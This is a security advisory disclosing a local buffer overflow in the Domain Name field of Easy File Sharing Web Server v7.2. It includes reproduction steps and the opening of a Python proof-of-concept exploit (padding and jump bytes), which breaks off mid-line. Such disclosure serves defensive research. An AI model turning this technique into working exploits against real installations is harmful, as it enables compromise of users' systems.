Document Title: =============== Easy File Sharing WS v7.2 - (Domain Name) Buffer Overflow References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2154 Release Date: ============= 2018-10-05 Vulnerability Laboratory ID (VL-ID): ==================================== 2154 Common Vulnerability Scoring System: ==================================== 7.3 Vulnerability Class: ==================== Buffer Overflow Current Estimated Price: ======================== 3.000€ - 4.000€ Product & Service Introduction: =============================== Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.). It can help you share files with your users, customers and partners. They can search for and download files from your computer or upload files from theirs. The files on your PC can be accessible from anywhere without special software. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It makes it easy for remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption. (Copy of the Homepage: http://www.sharing-file.com/ ) Abstract Advisory Information: ============================== An independent vulnerability researcher of the laboratory discovered a local buffer overflow vulnerability in the Easy File Sharing Web Server v7.2. Vulnerability Disclosure Timeline: ================================== 2018-10-02: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== EFS Software Inc Product: Easy File Sharing Web Server 7.2 Exploitation Technique: ======================= Local Severity Level: =============== High Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server v7.2. The software vulnerability allows local attackers to overwrite the registers (exp: eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The security vulnerability is marked as classic buffer overflow issue. The vulnerability is located in the `Domain Name` input field of the active directory - add domain function. The security risk of the local buffer overflow vulnerability is estimated as high with a cvss count of 7.3. Exploitation of the buffer overflow vulnerability requires a low privilege restricted system user account without user interaction. Successful exploitation of the vulnerability results in overwrite of the active registers to compromise of the computer system or process. Vulnerable Module(s): [+] Click User Account - Active Directory Vulnerable Function(s): [+] Add Domain Vulnerable Input(s): [+] Domain Name Proof of Concept (PoC): ======================= The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue. 1. Download and install Easy File Sharing Web Server v7.2 2. Run the python operating script that will create a file (poc.txt) 3. Run the software "Click User Account -> Active Directory -> Add Domain -> Domain Name (Input)" 4. Paste the contents of the file (poc.txt) into the input "Domain Name" and click "OK" Note: Now the calculator executes! 5. Successful reproduce of the local buffer overflow vulnerability! PoC: Exploit (Python) #!/usr/bin/python from struct import pack buffer = "x41" * 4059 a = "xebx06x90x90" b = pack("